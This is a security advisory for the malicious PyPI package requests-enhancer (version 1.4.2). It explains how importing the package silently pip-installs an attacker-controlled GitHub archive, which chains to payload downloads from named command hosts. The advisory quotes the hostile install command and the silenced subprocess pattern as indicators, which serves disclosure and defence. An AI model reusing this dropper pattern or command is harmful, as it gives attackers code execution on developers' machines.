VYPR

pypi · Malicious package advisory

Malware

requests-enhancer

MAL-2026-6247

Malicious code in requests-enhancer (PyPI)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a0f61f1a905e0ec1bb593f7b20d4f9a8a9e72deeb16440f72acbcaf00aeab1cd)
On `import requests_enhancer`, the package's `__init__.py` spawns a daemon thread that runs `pip install https://github.com/Hexa-devy/netflow-utils/archive/refs/heads/master.zip` via `subprocess.run([sys.executable, '-m', 'pip', 'install',...])`. The target is a mutable `master`-branch archive with no commit SHA, version, or hash pin; pip will execute the referenced repo's setup.py / build backend as part of installation, giving whoever controls that branch arbitrary code execution on every installer's machine each time the package is imported. The behavior is undeclared in pyproject.toml and undocumented in the README. The subprocess output is redirected to DEVNULL, exceptions are swallowed by a bare `except Exception: pass`, and the work is done on a daemon thread so the import returns immediately — making the fetch-and-execute invisible to the user and to synchronous import-time auditing. This is a textbook dropper: post-publish attacker-mutable code execution at import time, with deliberate silencing of evidence.

## Source: kam193 (950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62)
Malicious package with a chain of multiple manual dependencies to finally download malicious code. During import, it manually downloads a dependency from GitHub repository "Hexa-devy/netflow-utils", which then attempts to download "codexio-boop/platform_syslib". The last one contains obfuscated code that during installation connects with node22.lunes[.]host:3258 and downloads encrypted payload. The payload is executed, and it then starts another loop of connections to node22.lunes[.]host:22240 and awaits next payloads to execute. During analysis, this stage did not deliver any payload. On every stage, short-living generated tokens are used.


---

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.


Campaign: 2026-06-requests-enhancer


Reasons (based on the campaign):


 - backdoor


 - The package overrides the install command in setup.py to execute malicious code during installation.


 - obfuscation


 - The malicious code is intentionally included in a dependency of the package


 - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.

Compromised versions (1)

  • 1.4.2

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.